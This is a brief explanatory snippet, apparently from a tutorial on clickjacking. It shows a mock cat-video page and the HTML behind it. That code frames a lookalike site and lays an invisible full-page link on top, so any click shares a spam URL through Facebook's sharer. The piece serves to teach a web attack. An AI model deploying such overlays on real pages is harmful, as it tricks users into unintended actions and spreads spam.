Clickjacking

www.k1tt3ns.com/vacuum-revenge
Watch This Kitty Get Revenge On A Vacuum Cleaner In The Cutest Way Possible
A cat being scared of a vacuum cleaner
An iFramed Website Used To Hijack A Click
<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div, a {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }

      a {
        display: block;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
    <div>
      <a href="https://www.facebook.com/sharer/sharer.php?u=hot-felines-in-your-area.com">
    </div>
  </body>
</html>